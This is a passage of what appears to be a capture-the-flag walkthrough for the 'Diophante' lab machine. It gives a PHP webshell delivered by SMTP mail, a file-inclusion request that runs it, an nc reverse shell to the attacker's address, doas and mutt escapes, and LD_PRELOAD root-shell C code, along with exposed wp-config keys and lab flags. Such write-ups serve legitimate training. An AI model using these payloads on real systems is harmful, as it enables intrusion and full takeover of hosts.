-\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsabine:x:1000:1000:sabine,,,:\/home\/sabine:\/bin\/rbash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nmysql:x:106:113:MySQL 
Server,,,:\/nonexistent:\/bin\/false\npostfix:x:107:114::\/var\/spool\/postfix:\/usr\/sbin\/nologin\nleonard:x:1001:1001:,,,:\/home\/leonard:\/bin\/bash\n{&quot;success&quot;:true,&quot;data&quot;:{&quot;output&quot;:[]}}<\/code><\/pre>\n<h3>Uploading a webshell by mail<\/h3>\n<p>Since a file inclusion vulnerability is already available, getting a <code>shell<\/code> onto the host is enough for <code>RCE<\/code>, so try adding one through the smtp service:<\/p>\n<blockquote>\n<p>Take a snapshot of the machine at this point, to save trouble if the attempt fails...<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116110.png\" alt=\"image-20250614100554057\" \/><\/p>\n<p>If the toolbar shown above is missing, try the right-hand ctrl+f or c.<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ telnet $IP 25\nTrying 192.168.10.107...\nConnected to 192.168.10.107.\nEscape character is &#039;^]&#039;.\n220 debian ESMTP Postfix (Debian\/GNU)\nhelo abc\n250 debian\nMAIL FROM: kali@kali.com\n250 2.1.0 Ok\nRCPT TO: sabine\n250 2.1.5 Ok\ndata\n354 End data with 
&lt;CR&gt;&lt;LF&gt;.&lt;CR&gt;&lt;LF&gt;\n&lt;?=`$_GET[0]`?&gt;     \n.\n250 2.0.0 Ok: queued as 167E180ABD\nquit\n221 2.0.0 Bye\nConnection closed by foreign host.<\/code><\/pre>\n<p>The user is the one <code>wpscan<\/code> found during the initial information gathering; now request the mailbox file to execute a command!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ curl &quot;http:\/\/192.168.10.107\/blog\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/var\/mail\/sabine&amp;0=whoami&quot; --output - \nFrom kali@kali.com  Sat Jun 14 04:11:43 2025\nReturn-Path: &lt;kali@kali.com&gt;\nX-Original-To: sabine\nDelivered-To: sabine@debian\nReceived: from abc (unknown [192.168.10.102])\n        by debian (Postfix) with SMTP id 167E180ABD\n        for &lt;sabine&gt;; Sat, 14 Jun 2025 04:10:22 +0200 (CEST)\n\nwww-data\n\n{&quot;success&quot;:true,&quot;data&quot;:{&quot;output&quot;:[]}}<\/code><\/pre>\n<p>The command executed; set up a listener and try a reverse shell!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ curl &quot;http:\/\/192.168.10.107\/blog\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/var\/mail\/sabine&amp;0=nc+-e+\/bin\/bash+192.168.10.102+1234&quot; --output -<\/code><\/pre>\n<p><img 
src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116111.png\" alt=\"image-20250614101633797\" \/><\/p>\n<h2>Privilege escalation<\/h2>\n<h3>Information gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@diophante:\/var\/www\/html\/blog\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes$ cd ~\n(remote) www-data@diophante:\/var\/www$ ls -la\ntotal 12\ndrwxr-xr-x  3 root     root     4096 Apr  7  2021 .\ndrwxr-xr-x 12 root     root     4096 Apr  7  2021 ..\ndrwxr-xr-x  3 www-data www-data 4096 Apr 14  2021 html\n(remote) www-data@diophante:\/var\/www$ cd html\n(remote) www-data@diophante:\/var\/www\/html$ ls -la\ntotal 28\ndrwxr-xr-x 3 www-data www-data  4096 Apr 14  2021 .\ndrwxr-xr-x 3 root     root      4096 Apr  7  2021 ..\ndrwxr-xr-x 5 www-data www-data  4096 Apr 14  2021 blog\n-rw-r--r-- 1 www-data www-data 10701 Apr  7  2021 index.html\n-rw-r--r-- 1 www-data www-data    36 Apr 14  2021 note.txt\n(remote) www-data@diophante:\/var\/www\/html$ cd blog\n(remote) www-data@diophante:\/var\/www\/html\/blog$ ls -la\ntotal 228\ndrwxr-xr-x  5 www-data www-data  4096 Apr 14  2021 .\ndrwxr-xr-x  3 www-data www-data  4096 Apr 14  2021 ..\n-rw-r--r--  1 www-data www-data   299 Apr  7  2021 .htaccess\n-rw-r--r--  1 www-data www-data   405 Apr  7  2021 index.php\n-rw-r--r--  1 www-data www-data 19915 Apr  7  2021 license.txt\n-rw-r--r--  1 www-data www-data  8852 Apr  7  2021 readme.html\n-rw-r--r--  1 www-data www-data  7165 Apr  7  2021 wp-activate.php\ndrwxr-xr-x  9 www-data www-data  4096 Apr  7  2021 wp-admin\n-rw-r--r--  1 www-data www-data   351 Apr  7  2021 wp-blog-header.php\n-rw-r--r--  1 www-data www-data  2328 Apr  7  2021 wp-comments-post.php\n-rw-r--r--  1 www-data www-data  
3538 Apr  7  2021 wp-config-sample.php\n-rw-rw-rw-  1 www-data www-data  3812 Apr  7  2021 wp-config.php\ndrwxr-xr-x  7 www-data www-data  4096 Jun 14 03:53 wp-content\n-rw-r--r--  1 www-data www-data  3939 Apr  7  2021 wp-cron.php\ndrwxr-xr-x 25 www-data www-data 12288 Apr  7  2021 wp-includes\n-rw-r--r--  1 www-data www-data  2496 Apr  7  2021 wp-links-opml.php\n-rw-r--r--  1 www-data www-data  3313 Apr  7  2021 wp-load.php\n-rw-r--r--  1 www-data www-data 44993 Apr  7  2021 wp-login.php\n-rw-r--r--  1 www-data www-data  8509 Apr  7  2021 wp-mail.php\n-rw-r--r--  1 www-data www-data 21125 Apr  7  2021 wp-settings.php\n-rw-r--r--  1 www-data www-data 31328 Apr  7  2021 wp-signup.php\n-rw-r--r--  1 www-data www-data  4747 Apr  7  2021 wp-trackback.php\n-rw-r--r--  1 www-data www-data  3236 Apr  7  2021 xmlrpc.php\n(remote) www-data@diophante:\/var\/www\/html\/blog$ cat wp-config.php\n&lt;?php\n\/**\n * La configuration de base de votre installation WordPress.\n *\n * Ce fichier est utilis\u00e9 par le script de cr\u00e9ation de wp-config.php pendant\n * le processus d\u2019installation. Vous n\u2019avez pas \u00e0 utiliser le site web, vous\n * pouvez simplement renommer ce fichier en \u00ab wp-config.php \u00bb et remplir les\n * valeurs.\n *\n * Ce fichier contient les r\u00e9glages de configuration suivants :\n *\n * R\u00e9glages MySQL\n * Pr\u00e9fixe de table\n * Cl\u00e9s secr\u00e8tes\n * Langue utilis\u00e9e\n * ABSPATH\n *\n * @link https:\/\/fr.wordpress.org\/support\/article\/editing-wp-config-php\/.\n *\n * @package WordPress\n *\/\n\n\/\/ ** R\u00e9glages MySQL - Votre h\u00e9bergeur doit vous fournir ces informations. ** \/\/\n\/** Nom de la base de donn\u00e9es de WordPress. *\/\ndefine( &#039;DB_NAME&#039;, &#039;wordpress&#039; );\n\n\/** Utilisateur de la base de donn\u00e9es MySQL. *\/\ndefine( &#039;DB_USER&#039;, &#039;wpuser&#039; );\n\n\/** Mot de passe de la base de donn\u00e9es MySQL. 
*\/\ndefine( &#039;DB_PASSWORD&#039;, &#039;wppassword&#039; );\n\n\/** Adresse de l\u2019h\u00e9bergement MySQL. *\/\ndefine( &#039;DB_HOST&#039;, &#039;localhost&#039; );\n\n\/** Jeu de caract\u00e8res \u00e0 utiliser par la base de donn\u00e9es lors de la cr\u00e9ation des tables. *\/\ndefine( &#039;DB_CHARSET&#039;, &#039;utf8mb4&#039; );\n\n\/**\n * Type de collation de la base de donn\u00e9es.\n * N\u2019y touchez que si vous savez ce que vous faites.\n *\/\ndefine( &#039;DB_COLLATE&#039;, &#039;&#039; );\n\n\/**#@+\n * Cl\u00e9s uniques d\u2019authentification et salage.\n *\n * Remplacez les valeurs par d\u00e9faut par des phrases uniques !\n * Vous pouvez g\u00e9n\u00e9rer des phrases al\u00e9atoires en utilisant\n * {@link https:\/\/api.wordpress.org\/secret-key\/1.1\/salt\/ le service de cl\u00e9s secr\u00e8tes de WordPress.org}.\n * Vous pouvez modifier ces phrases \u00e0 n\u2019importe quel moment, afin d\u2019invalider tous les cookies existants.\n * Cela forcera \u00e9galement tous les utilisateurs \u00e0 se reconnecter.\n *\n * @since 2.6.0\n *\/\ndefine( &#039;AUTH_KEY&#039;,         &#039;#,g&gt;&lt;LSZX0HW]D&lt;yRmgs&amp;Wf8TZgQ:J3]+`X6iZ1`Eq%j$jLId(g;&gt;rFU.R]~FN:l&#039; );\ndefine( &#039;SECURE_AUTH_KEY&#039;,  &#039;OvszI?ZXB2tO=s=e;JCT{r[*[wU4HYjN]Ul;QSrnhq|M=x8fJjf4,T.ek^|t*)oE&#039; );\ndefine( &#039;LOGGED_IN_KEY&#039;,    &#039;+B!0BXPa#n\/dITg~&gt;`y1Ns|?=Kw|Ph)W!:IY!c?KB-vkmXLh.961;wkd+.i&gt;o!&gt;7&#039; );\ndefine( &#039;NONCE_KEY&#039;,        &#039;:tF;H[_jOV,:H*~&lt;EYS3:jCGpvHM8\/:=V{-NDl2d36\/ivnA@EFG8q7cQ%SJEW8Y3&#039; );\ndefine( &#039;AUTH_SALT&#039;,        &#039;rVEb=RPOZG]`pQm2Vv?8k$|7SS+)MshG1sI8RZN.2Plwk#J)O75d1Q%|TuE()lE$&#039; );\ndefine( &#039;SECURE_AUTH_SALT&#039;, &#039;yg4jQXSs=[xb-Y3[!3shWt,UK3T:[+`Yi\/8{#w|r]x6#+$VIV+*4&lt;2.&amp;@]!3NAH8&#039; );\ndefine( &#039;LOGGED_IN_SALT&#039;,   &#039;a73Rg9qLRDaGbfEU9-y&amp;$BY7~vLQ+gqGhAdzj8C:X d}j.GKn&gt;5NSoC!,sPGD^ke&#039; );\ndefine( &#039;NONCE_SALT&#039;,       
&#039;) F1enYj2.O5.:UWZ0CS{5y~i[JZ0FRC`X_q3r0\/T?=naqS$N*weR-059*uTXXh7&#039; );\n\/**#@-*\/\n\n\/**\n * Pr\u00e9fixe de base de donn\u00e9es pour les tables de WordPress.\n *\n * Vous pouvez installer plusieurs WordPress sur une seule base de donn\u00e9es\n * si vous leur donnez chacune un pr\u00e9fixe unique.\n * N\u2019utilisez que des chiffres, des lettres non-accentu\u00e9es, et des caract\u00e8res soulign\u00e9s !\n *\/\n$table_prefix = &#039;wp_&#039;;\n\n\/**\n * Pour les d\u00e9veloppeurs : le mode d\u00e9boguage de WordPress.\n *\n * En passant la valeur suivante \u00e0 &quot;true&quot;, vous activez l\u2019affichage des\n * notifications d\u2019erreurs pendant vos essais.\n * Il est fortement recommand\u00e9 que les d\u00e9veloppeurs d\u2019extensions et\n * de th\u00e8mes se servent de WP_DEBUG dans leur environnement de\n * d\u00e9veloppement.\n *\n * Pour plus d\u2019information sur les autres constantes qui peuvent \u00eatre utilis\u00e9es\n * pour le d\u00e9boguage, rendez-vous sur le Codex.\n *\n * @link https:\/\/fr.wordpress.org\/support\/article\/debugging-in-wordpress\/\n *\/\ndefine( &#039;WP_DEBUG&#039;, false );\n\n\/* C\u2019est tout, ne touchez pas \u00e0 ce qui suit ! Bonne publication. *\/\n\n\/** Chemin absolu vers le dossier de WordPress. *\/\nif ( ! defined( &#039;ABSPATH&#039; ) )\n  define( &#039;ABSPATH&#039;, dirname( __FILE__ ) . &#039;\/&#039; );\n\n\/** R\u00e9glage des variables de WordPress et de ses fichiers inclus. *\/\nrequire_once( ABSPATH . 
&#039;wp-settings.php&#039; );<\/code><\/pre>\n<p>This gives us a database, but the user and password are all defaults, so I won&#039;t try it for now.<\/p>\n<h3>Switching user with setsid<\/h3>\n<p>Let&#039;s look at something else:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@diophante:\/var\/www\/html\/blog$ cat \/etc\/passwd | grep sh | cut -d: -f1\nBinary file (standard input) matches\n(remote) www-data@diophante:\/var\/www\/html\/blog$ echo $SHELL\n\/usr\/sbin\/nologin\n(remote) www-data@diophante:\/var\/www\/html\/blog$ cd \/home\n(remote) www-data@diophante:\/home$ ls -la\ntotal 16\ndrwxr-xr-x  4 root    root    4096 Apr  7  2021 .\ndrwxr-xr-x 18 root    root    4096 Apr  6  2021 ..\ndrwxr-xr-x  5 leonard leonard 4096 Apr 14  2021 leonard\ndrwxr-xr-x  5 sabine  sabine  4096 Apr  8  2021 sabine\n(remote) www-data@diophante:\/home$ cd leonard\/\n(remote) www-data@diophante:\/home\/leonard$ ls -la\ntotal 44\ndrwxr-xr-x 5 leonard leonard 4096 Apr 14  2021 .\ndrwxr-xr-x 4 root    root    4096 Apr  7  2021 ..\n-rw------- 1 leonard leonard   52 Apr  7  2021 .Xauthority\nlrwxrwxrwx 1 leonard leonard    9 Apr  8  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 leonard leonard  220 Apr  7  2021 .bash_logout\n-rw-r--r-- 1 leonard leonard 3526 Apr  7  2021 .bashrc\ndrwx------ 3 leonard leonard 4096 Apr  7  2021 .gnupg\ndrwxr-xr-x 3 leonard leonard 4096 Apr  7  2021 .local\n-rw-r--r-- 1 leonard leonard  807 Apr  7  2021 .profile\ndrwx------ 2 leonard leonard 4096 Apr  8  2021 .ssh\n-rw-r--r-- 1 leonard leonard  209 Apr  7  2021 .wget-hsts\n-rwx------ 1 leonard leonard   16 Apr  8  2021 user.txt\n(remote) www-data@diophante:\/home\/leonard$ cd  ..\/sabine\/\n(remote) www-data@diophante:\/home\/sabine$ ls -la\ntotal 36\ndrwxr-xr-x 5 sabine sabine 4096 Apr  8  2021 .\ndrwxr-xr-x 4 root   root   4096 Apr  7  2021 ..\n-rw------- 1 sabine sabine   52 Apr  7  2021 .Xauthority\nlrwxrwxrwx 1 root   root      
9 Apr  8  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 sabine sabine  220 Apr  6  2021 .bash_logout\n-rw-r--r-- 1 sabine sabine 3526 Apr  6  2021 .bashrc\ndrwx------ 3 sabine sabine 4096 Apr  7  2021 .gnupg\ndrwxr-xr-x 3 sabine sabine 4096 Apr  7  2021 .local\n-rw-r--r-- 1 sabine sabine  807 Apr  6  2021 .profile\ndrwx------ 2 sabine sabine 4096 Apr 14  2021 .ssh\n(remote) www-data@diophante:\/home\/sabine$ cd ~\n(remote) www-data@diophante:\/var\/www$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/mount\n\/usr\/bin\/xclip\n\/usr\/bin\/newgrp\n\/usr\/bin\/gpasswd\n\/usr\/bin\/doas\n\/usr\/bin\/chsh\n\/usr\/bin\/su\n\/usr\/bin\/umount\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/sudo\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/sbin\/pppd\n(remote) www-data@diophante:\/var\/www$ find \/ -name &quot;*doas*&quot; 2&gt;\/dev\/null\n\/var\/lib\/dpkg\/info\/doas.conffiles\n\/var\/lib\/dpkg\/info\/doas.md5sums\n\/var\/lib\/dpkg\/info\/doas.list\n\/etc\/pam.d\/doas\n\/etc\/doas.conf\n\/usr\/share\/doc\/doas\n\/usr\/share\/lintian\/overrides\/doas\n\/usr\/share\/man\/man5\/doas.conf.5.gz\n\/usr\/share\/man\/man1\/doas.1.gz\n\/usr\/bin\/doas\n(remote) www-data@diophante:\/var\/www$ cat \/etc\/doas.conf\npermit nopass www-data as sabine cmd \/usr\/bin\/setsid\npermit nopass sabine as leonard cmd \/usr\/bin\/mutt<\/code><\/pre>\n<p>The <code>www-data<\/code> user can run setsid as sabine:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ tldr setsid    \n\n  Run a program in a new session if the calling process is not a process group leader.\n  The created session is by default not controlled by the current terminal.\n  More information: &lt;https:\/\/manned.org\/setsid&gt;.\n\n  Run a program in a new session:\n\n      setsid program\n\n  Run a program in a new session 
discarding the resulting output and error:\n\n      setsid program &gt; \/dev\/null 2&gt;&amp;1\n\n  Run a program creating a new process:\n\n      setsid [-f|--fork] program\n\n  Return the exit code of a program as the exit code of setsid when the program exits:\n\n      setsid [-w|--wait] program\n\n  Run a program in a new session setting the current terminal as the controlling terminal:\n\n      setsid [-c|--ctty] program<\/code><\/pre>\n<p>It turns out to be a tool that creates a session. Let&#039;s try it:<\/p>\n<pre><code class=\"language-bash\">\/usr\/bin\/doas -u sabine \/usr\/bin\/setsid \/bin\/bash<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116112.png\" alt=\"image-20250614102411431\" \/><\/p>\n<p>Switched user successfully!<\/p>\n<h3>Escalating to another user with mutt<\/h3>\n<p>Also note the <code>sabine as leonard cmd \/usr\/bin\/mutt<\/code> rule seen just now: sabine has a special permission too. Let&#039;s see what this <code>mutt<\/code> is:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ tldr mutt  \n\n  Command-line email client.\n  More information: &lt;http:\/\/mutt.org\/doc\/mutt.1.txt&gt;.\n\n  Open the specified mailbox:\n\n      
mutt -f mailbox\n\n  Send an email and specify a subject and a cc recipient:\n\n      mutt -s subject -c cc@example.com recipient@example.com\n\n  Send an email with files attached:\n\n      mutt -a file1 file2 -- recipient@example.com\n\n  Specify a file to include as the message body:\n\n      mutt -i path\/to\/file recipient@example.com\n\n  Specify a draft file containing the header and the body of the message, in RFC 5322 format:\n\n      mutt -H path\/to\/file recipient@example.com<\/code><\/pre>\n<p>It is a mail client. Open it and take a look first:<\/p>\n<pre><code class=\"language-bash\">\/usr\/bin\/doas -u leonard \/usr\/bin\/mutt<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116113.png\" alt=\"image-20250614102747936\" \/><\/p>\n<p>I couldn&#039;t make anything out at all... I pressed keys at random, was reminded of the <code>Orasi<\/code> machine, looked at the relevant commands, and found:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116114.png\" alt=\"image-20250614103157664\" \/><\/p>\n<p>Try to escape: press esc a few times, then press <code>!<\/code> a few times:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116115.png\" alt=\"image-20250614103249412\" \/><\/p>\n<p>Then <code>\/bin\/bash<\/code> is all it takes to switch user...<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116116.png\" alt=\"image-20250614103336715\" \/><\/p>\n<h3>LD hijacking to root<\/h3>\n<pre><code class=\"language-bash\">leonard@diophante:~$ ls -la\ntotal 48\ndrwxr-xr-x 6 leonard leonard 4096 Jun 14 04:27 .\ndrwxr-xr-x 4 root    root    4096 Apr  7  2021 ..\n-rw------- 1 leonard leonard   52 Apr  7  2021 .Xauthority\nlrwxrwxrwx 1 leonard leonard    9 Apr  8  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 leonard leonard  220 Apr  7  2021 .bash_logout\n-rw-r--r-- 1 leonard leonard 3526 Apr  7  2021 .bashrc\ndrwx------ 3 leonard leonard 4096 Apr  7  2021 .gnupg\ndrwxr-xr-x 3 leonard leonard 4096 Apr  7  2021 .local\n-rw-r--r-- 1 leonard leonard  807 Apr  7  2021 .profile\ndrwx------ 2 leonard leonard 4096 Apr  8  2021 .ssh\n-rw-r--r-- 1 leonard leonard  209 Apr  7  2021 .wget-hsts\ndrwx------ 2 leonard leonard 4096 Jun 14 04:27 Mail\n-rwx------ 1 leonard leonard   16 Apr  8  2021 user.txt\nleonard@diophante:~$ cat user.txt \nThonirburarnlog\nleonard@diophante:~$ cd Mail\/\nleonard@diophante:~\/Mail$ ls -la\ntotal 8\ndrwx------ 2 leonard leonard 4096 Jun 14 04:27 .\ndrwxr-xr-x 6 leonard leonard 4096 Jun 14 04:27 ..\nleonard@diophante:~\/Mail$ cd ..\/\nleonard@diophante:~$ sudo -l\nMatching Defaults entries for leonard on diophante:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, env_keep+=LD_PRELOAD\n\nUser leonard may run the following commands on diophante:\n    (ALL : ALL) NOPASSWD: 
\/usr\/bin\/ping<\/code><\/pre>\n<p>Note <code>env_keep+=LD_PRELOAD<\/code>: it means the shared library we specify is also preserved. Try hijacking, and first see which functions <code>ping<\/code> has:<\/p>\n<pre><code class=\"language-bash\">leonard@diophante:~$ ping -V\nping utility, iputils-s20180629<\/code><\/pre>\n<p>Find that version, download it, and see what is in the source code: <a href=\"https:\/\/github.com\/iputils\/iputils\/releases\/tag\/s20180629\">https:\/\/github.com\/iputils\/iputils\/releases\/tag\/s20180629<\/a><\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116117.png\" alt=\"image-20250614104742417\" \/><\/p>\n<p>I picked one at random, let&#039;s use it!<\/p>\n<p>For the actual script, see: <a 
href=\"https:\/\/book.hacktricks.wiki\/en\/linux-hardening\/privilege-escalation\/index.html?highlight=LD_PRELOAD#ld_preload--ld_library_path\">https:\/\/book.hacktricks.wiki\/en\/linux-hardening\/privilege-escalation\/index.html?highlight=LD_PRELOAD#ld_preload--ld_library_path<\/a><\/p>\n<p>Then I suddenly and sadly realized there was no need to look for that function name at all; defining the function as follows is enough...<\/p>\n<pre><code class=\"language-c\">#include &lt;stdio.h&gt;\n#include &lt;sys\/types.h&gt;\n#include &lt;stdlib.h&gt;\n\nvoid _init() {\n    unsetenv(&quot;LD_PRELOAD&quot;);\n    setgid(0);\n    setuid(0);\n    system(&quot;\/bin\/bash&quot;);\n}<\/code><\/pre>\n<p>Then try compiling it on the target machine:<\/p>\n<pre><code class=\"language-bash\">cd \/tmp\ngcc -fPIC -shared -o pe.so pe.c -nostartfiles\n# sudo LD_PRELOAD=.\/pe.so &lt;COMMAND&gt; #Use any command you can run with sudo<\/code><\/pre>\n<p>But since we are already here, let&#039;s define it as the function we found and see whether that works!<\/p>\n<pre><code class=\"language-c\">#include &lt;stdio.h&gt;\n#include &lt;sys\/types.h&gt;\n#include &lt;stdlib.h&gt;\n\nvoid create_socket() {\n    unsetenv(&quot;LD_PRELOAD&quot;);\n    setgid(0);\n    setuid(0);\n    system(&quot;\/bin\/bash&quot;);\n}<\/code><\/pre>\n<p>But it doesn&#039;t seem to have worked...<\/p>\n<pre><code class=\"language-bash\">leonard@diophante:\/tmp$ nano exp.c\nleonard@diophante:\/tmp$ chmod +x exp.c\nleonard@diophante:\/tmp$ gcc -fPIC -shared -o exp.so exp.c -nostartfiles\nexp.c: In function &#039;create_socket&#039;:\nexp.c:7:5: warning: implicit declaration of function &#039;setgid&#039; [-Wimplicit-function-declaration]\n    7 |     setgid(0);\n      |     ^~~~~~\nexp.c:8:5: 
warning: implicit declaration of function &#039;setuid&#039; [-Wimplicit-function-declaration]\n    8 |     setuid(0);\n      |     ^~~~~~\nleonard@diophante:\/tmp$ sudo -l\nMatching Defaults entries for leonard on diophante:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, env_keep+=LD_PRELOAD\n\nUser leonard may run the following commands on diophante:\n    (ALL : ALL) NOPASSWD: \/usr\/bin\/ping<\/code><\/pre>\n<p>The terminal also blew up and <code>ctrl+c<\/code> could not stop it... Repeat the steps above to log back in as the user, and quickly set up an <code>id_rsa<\/code>:<\/p>\n<pre><code class=\"language-bash\">leonard@diophante:~\/.ssh$ ssh-keygen -o\nGenerating public\/private rsa key pair.\nEnter file in which to save the key (\/home\/leonard\/.ssh\/id_rsa): \nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/leonard\/.ssh\/id_rsa\nYour public key has been saved in \/home\/leonard\/.ssh\/id_rsa.pub\nThe key fingerprint is:\nSHA256:FNvoQ9AXOxppJgoEL1itUoXyBtJ\/8QLFIUoCdqkQJOE leonard@diophante\nThe key&#039;s randomart image is:\n+---[RSA 3072]----+\n|XB+=+o+o. ..     |\n|X*=oo.o..*..     |\n|=E=o ..oX.+      |\n|.o+...oB.o .     |\n| o  .. .S        |\n|         .       
|\n|                 |\n|                 |\n|                 |\n+----[SHA256]-----+\nleonard@diophante:~\/.ssh$ ls -la\ntotal 16\ndrwx------ 2 leonard leonard 4096 Jun 14 04:59 .\ndrwxr-xr-x 6 leonard leonard 4096 Jun 14 04:27 ..\n-rw------- 1 leonard leonard 2602 Jun 14 04:59 id_rsa\n-rw------- 1 leonard leonard  571 Jun 14 04:59 id_rsa.pub\nleonard@diophante:~\/.ssh$ cat id_rsa\n\nleonard@diophante:~\/.ssh$ mv id_rsa.pub authorized_keys<\/code><\/pre>\n<p>Connect over ssh and test. Then I realized this is a static function: it is visible only in the source file that defines it and is not exported to the symbol table, so it cannot be hijacked. Pick another one: (stunned by my own noobness.jpg)<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116118.png\" alt=\"image-20250614111327780\" \/><\/p>\n<pre><code class=\"language-c\">#include &lt;stdio.h&gt;\n#include &lt;sys\/types.h&gt;\n#include &lt;stdlib.h&gt;\n\nvoid setlocale() {\n    unsetenv(&quot;LD_PRELOAD&quot;);\n    setgid(0);\n    setuid(0);\n    system(&quot;\/bin\/bash&quot;);\n}<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116119.png\" alt=\"image-20250614111540899\" \/><\/p>\n<p>Privilege escalation succeeded!<\/p>\n<pre><code class=\"language-bash\">root@diophante:\/tmp# cd ~\nroot@diophante:~# whoami;id\nroot\nuid=0(root) gid=0(root) groupes=0(root)\nroot@diophante:~# ls -la\ntotal 40\ndrwx------  4 root root 4096 avril 14  2021 .\ndrwxr-xr-x 18 root root 4096 avril  6  2021 ..\nlrwxrwxrwx  1 root root    9 avril  8  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  570 janv. 
31  2010 .bashrc\ndrwx------  3 root root 4096 avril  7  2021 .gnupg\ndrwxr-xr-x  3 root root 4096 avril  8  2021 .local\n-rw-------  1 root root  182 avril  7  2021 .mysql_history\n-rw-r--r--  1 root root  148 ao\u00fbt  17  2015 .profile\n-rwx------  1 root root   13 avril  8  2021 root.txt\n-rw-r--r--  1 root root   66 avril  7  2021 .selected_editor\n-rw-------  1 root root  211 avril 14  2021 .Xauthority\nroot@diophante:~# cat root.txt \nCulcelborlus\nroot@diophante:~# cat .mysql_history \n create database wordpress;\ncreate user wpuser; \nset password for wpuser= PASSWORD(&quot;wppassword&quot;);\nGRANT ALL PRIVILEGES ON wordpress.* TO wpuser@localhost IDENTIFIED by &quot;wppassword&quot;;<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Diophante Information gathering Port scanning \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante] \u2514 